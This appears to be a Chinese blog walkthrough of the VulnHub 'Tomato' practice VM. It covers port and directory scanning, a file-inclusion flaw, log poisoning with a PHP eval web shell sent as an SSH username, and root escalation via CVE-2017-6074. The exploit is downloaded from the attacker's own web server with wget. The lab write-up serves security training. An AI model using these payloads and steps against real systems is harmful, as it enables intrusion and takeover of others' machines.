VulnhubTomato靶机详解

项目地址

https://www.vulnhub.com/entry/tomato-1,557/

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知Tomato的一个ip地址为192.168.47.141

扫描earth的操作系统,端口及对应服务

nmap -A -p- 192.168.47.141

image.png

发现开放21,80,2211,8888端口

扫描目录

dirb http://192.168.47.141

image.png

访问页面

image.png
没有有用信息

访问8888端口

image.png
需要账号密码

访问用dirb扫出来的站点

image.png

发现站点目录

image.png

查看info.php

image.png

查看源码

image.png
发现有文件包含漏洞

对网址进行包含尝试
http://192.168.47.141/antibot_image/antibots/info.php?image=../../../../../../etc/passwd

image.png
:::info
存在
tomato❌1000:1000:Tomato,:/home/tomato:/bin/bashsshd❌108:65534::/var/run/sshd:/usr/sbin/nologin ftp❌109:117:ftp daemon,:/srv/ftp:/bin/false
:::

尝试用tomato为用户名登陆一下(kali不行换CentOS)

image.png
登录失败

查看它的一个日志
http://192.168.47.141/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

image.png
发现用户名被写了进去

尝试用php代码作为用户名进行注入
ssh '<?php @eval($_POST['cmd']); ?>'@192.168.47.141 -p 2211

image.png
发现被写了进去

尝试用蚁剑进行一个连接

image.png
连接成功

右键打开终端

image.png

提权

寻找有无可以利用的 exp
uname -a

image.png

使用命令下载(要使用CVE-2017-6074)
git clone https://github.com/kkamagui/linux-kernel-exploits

image.png

在kali运行sh文件编译,编译成功之后会生成一个文件

image.png

开启KALI的apache服务
service apache2 start

把生成的文件放在网站目录下面也就是/var/www/html目录下面
cp CVE-2017-6074 /var/www/html/

回到蚁剑

在tmp目录下面使用wget命令下载kali刚刚复制的文件用来提权,顺便赋予777权限

cd tmp
wget http://192.168.47.129/CVE-2017-6074
chmod 777 CVE-2017-6074

image.png
image.png
在靶机运行即可
这边一运行虚拟机就直接卡死了
网上查看了一番应该是成功了

  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值